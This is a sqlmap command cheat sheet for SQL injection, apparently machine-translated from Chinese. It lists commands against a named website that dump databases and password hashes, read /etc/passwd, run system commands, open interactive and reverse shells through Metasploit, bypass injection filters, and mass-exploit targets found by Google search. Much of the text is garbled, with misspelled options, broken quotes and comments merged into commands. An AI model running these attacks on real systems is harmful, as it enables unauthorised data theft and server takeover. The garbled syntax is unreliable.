Common tools for penetration testing-sqlmap

Basic usage

sqlmap -u "url"

Scan out some system information, as shown in the figure:

sqlmp -u "url" --current-user

Explode the current user name

sqlmap -u "url" --currnet-db

Current database

sqlmap -u "url" --tables -D "db_name"

Guess the table name based on this library

sqlmap -u "url" --columns -T "tables_name" users -D "db_name" -v 0

According to the library, the table guesses the field.

sqlmap -u "url" --dump -C "columns_name" -T "tables_name" -D "db_name" -v 0

Check records

Access to information

List other databases

sqlmap -u "url" dbs

Enumerate database user roles

sqlmap -u "url" -roles

sqlmap -u "url" --dump-all

Take off pants

The directories are under the root directory./sqlmap

PS

Usage record of SQLMAP

*** Basic steps

sqlmap -u "http://doscn.org/news?id=1" --current-user #Get the current user name
sqlmap -u "http://doscn.org/news?id=1" --current- db
#Get the current database name sqlmap -u "http://doscn.org/news?id=1" --tables -D "db_name"
#List name sqlmap -u "http://doscn.org/news?id = 1 ”--columns -T“ tablename ”users-D“ db_name ”-v 0
#Column field sqlmap -u“ http://doscn.org/news?id=1 ”--dump -C“ column_name ”- T “table_name” -D
“db_name” -v 0 #Get field content
information and get sqlmap -u “http://doscn.org/news?id=1” --smart --level 3 --users # smart smart level Execution test level
sqlmap -u "http://doscn.org/news?id=1" --dbms "Mysql" --users # dbms Specify the database type
sqlmap -u "http://doscn.org/news?id = 1 "--users #Column database user
sqlmap -u" http://doscn.org/news?id=1 "--dbs # Column database
sqlmap -u "http://doscn.org/news?id=1" --passwords
#Database user password sqlmap -u "http://doscn.org/news?id=1" --passwords-U root- v 0
#List the password of the specified user database sqlmap -u "http://doscn.org/news?id=1" --dump -C "password, user, id" -T "tablename" -D "db_name"- -start 1 --stop 20
#List specified fields, list 20 sqlmap -u "http://doscn.org/news?id=1" --dump-all -v 0 #List all tables in all databases
sqlmap -u "http://doscn.org/news?id=1" --privileges #View permissions
sqlmap -u "http://doscn.org/news?id=1" --privileges -U root #View Specify user permissions
sqlmap -u "http://doscn.org/news?id=1" --is-dba -v 1
#Is it the database administrator sqlmap -u "http://doscn.org/news?id = 1 "--roles #Enumerate database user roles
sqlmap -u" http://doscn.org/news?id=1 "--udf-inject #Import user-defined functions (acquire system permissions!)
sqlmap -u "http://doscn.org/news?id=1" --dump-all --exclude-sysdbs -v 0
#List all tables in the current library sqlmap -u "http://doscn.org/ news? id = 1 "--union-cols #union query table record
sqlmap -u" http://doscn.org/news?id=1 "--cookie" COOKIE_VALUE "#cookie injection
sqlmap -u" http: / /doscn.org/news?id=1 ”-b #Get banner information
sqlmap -u“ http://doscn.org/news?id=1 ”--data“ id = 3 ”#post inject
sqlmap -u“ http://doscn.org/news?id=1 ”-v 1 -f
#Fingerprint identification database type sqlmap -u“ http://doscn.org/news?id=1 ”--proxy" http: // 127.0.0.1:8118 "
#Proxy injection sqlmap -u“ http://doscn.org/news?id=1”–string"STRING_ON_TRUE_PAGE "
#Specify keyword sqlmap -u“ http://doscn.org/news? id = 1 "--sql-shell #Execute the specified sql command
sqlmap -u" http://doscn.org/news?id=1 "--file / etc / passwd
sqlmap -u "http://doscn.org/news?id=1" --os-cmd = whoami #Execute system commands

sqlmap -u "http://doscn.org/news?id=1" --os-shell
#system interactive shell sqlmap -u "http://doscn.org/news?id=1" --os-pwn
#Bounce shell sqlmap -u "http://doscn.org/news?id=1" --reg-read #read win system registry
sqlmap -u "http://doscn.org/news?id=1 "--Dbs-o" sqlmap.log "#Save progress
sqlmap -u" http://doscn.org/news?id=1 "--dbs -o" sqlmap.log "--resume #Restore saved progress
sqlmap -u "http://doscn.org/news?id=1" --msf-path = / opt / metasploit3 / msf2 --os-pwn bounce shell requires
metasploit path
sqlmap -u "http: // doscn. org / news? id = 1 "--tamper" base64encode.py "load script (available to bypass injection restrictions)
sqlmap -g" google syntax "--dump-all --batch #google search injection points automatically run out of all Field
Attack example:
sqlmap -u "http://doscn.org/news?id=1&Submit=Submit" --cookie = "PHPSESSID = 41aa833e6d0d
28f489ff1ab5a7531406” --string=“Surname” --dbms=mysql --users --password